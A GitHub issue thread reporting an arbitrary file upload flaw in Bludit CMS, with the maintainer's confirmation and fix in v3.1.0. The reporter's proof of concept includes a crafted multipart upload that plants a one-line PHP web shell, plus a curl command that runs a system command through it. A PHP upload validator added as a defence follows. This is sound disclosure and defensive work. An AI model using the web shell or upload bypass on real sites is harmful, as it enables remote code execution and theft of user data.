
Arbitrary File Upload - Security #812

Closed
bousalman opened this Issue Oct 2, 2018 · 5 comments


bousalman commented Oct 2, 2018

Hi There,

I was trying the application for a while and noticed that a regular user (Editor role) can upload an arbitrary file, in this case a PHP file. He can then run remote PHP commands in the server context.

Is it OK to describe the vulnerability here, or do you prefer that I send it in private?

Thanks.


dignajar commented Oct 2, 2018

Hi,
it is OK here. I'm checking, and it is true that it is possible to upload a PHP file; I am going to fix it.
I can't find a way to execute it. Can you show me an example?
Regards
Diego


bousalman commented Oct 3, 2018

Hi Diego,

The upload function for pictures is done by POSTing to "/admin/ajax/upload-files"; an Editor role user can upload pictures when he creates or modifies content.

Now a malicious user can modify the HTTP request to edit the photo content and name. Here I am using the Burp Suite proxy to do it:

POST /admin/ajax/upload-files HTTP/1.1
Host: 192.168.140.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.140.154/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close

-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"

67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>

-----------------------------26228568510541774541866388118--

and the response is:
{"status":0,"message":"Image uploaded success.","filename":"poc.php","absoluteURL":"http://192.168.140.154/bl-content/uploads/poc.php","absoluteURLThumbnail":"http://192.168.140.154/bl-content/uploads/thumbnails/poc.php","absolutePath":"/var/www/html/bl-content/uploads/poc.php"}

Next, the malicious user can request the uploaded PHP file, since the path is known from the HTTP response. Here I am running a system command through the PHP page:

root@kali:~# curl http://192.168.140.154/bl-content/uploads/poc.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

By now the malicious user has remote command execution through the web shell and can run any terminal command he wants, for example downloading the user database file (XML) and starting to crack all users' passwords, since the hash is stored along with the salt.

Mitigation:
I did a quick code review; you should implement a whitelist for file extensions that allows only photo ones.
Moreover, some frameworks do inspection/processing of photo files before saving them to disk, which will corrupt the malicious user's payload.

Thanks,
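The mitigation suggested above (an extension whitelist plus content inspection, rather than trusting the client's filename or Content-Type), as an added example that is not Bludit's own code: a hypothetical validator the upload handler would call with the temporary path and original name from $_FILES before moving the file into the uploads directory.

```php
<?php
// Added example, not Bludit's code. Everything the client sends (filename,
// Content-Type header) is untrusted; the decision rests on the file bytes.

const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif'];
const ALLOWED_MIME       = ['image/png', 'image/jpeg', 'image/gif'];
const IMAGETYPE_TO_EXT   = [
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_GIF  => 'gif',
];

/**
 * Returns a safe target filename for the uploaded file at $tmpPath, or throws
 * if it is not an image we accept. $originalName is consulted only for its
 * final extension, so "poc.php" and "shell.php.png" are judged by that part.
 */
function validateImageUpload(string $tmpPath, string $originalName): string
{
    // 1. Extension whitelist on the client-supplied name.
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        throw new RuntimeException("Extension '$ext' is not an allowed image type");
    }

    // 2. Magic-byte detection; the declared multipart Content-Type is ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        throw new RuntimeException("Content detected as $mime, not an image");
    }

    // 3. Parse the image header; a PHP script fails here even if step 2 were fooled.
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset(IMAGETYPE_TO_EXT[$info[2]])) {
        throw new RuntimeException('File does not parse as a supported image');
    }

    // 4. Never reuse the client name: random name plus an extension derived
    //    from the detected type, so the stored file is never a script.
    return bin2hex(random_bytes(16)) . '.' . IMAGETYPE_TO_EXT[$info[2]];
}

// Constructed demo: a PHP file submitted under the report's "poc.php" name.
$tmp = tempnam(sys_get_temp_dir(), 'upl');
file_put_contents($tmp, '<?php echo "not an image"; ?>');
try {
    validateImageUpload($tmp, 'poc.php');
} catch (RuntimeException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}
unlink($tmp);
```

In the real handler the returned name is what move_uploaded_file() writes to; as a second layer, the web server should be configured not to execute scripts under the uploads directory at all.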


dignajar commented Oct 4, 2018

Clear, I am going to check the file extension. There is another way, checking the EXIF data, but I would need to add more requirements to the system and I don't want to add more complexity for the users.
Thanks for reporting it.


bousalman commented Oct 4, 2018

You're welcome, glad I could help.


dignajar commented Oct 8, 2018

Implemented in Bludit v3.1.0. Thanks!

dignajar closed this Oct 8, 2018
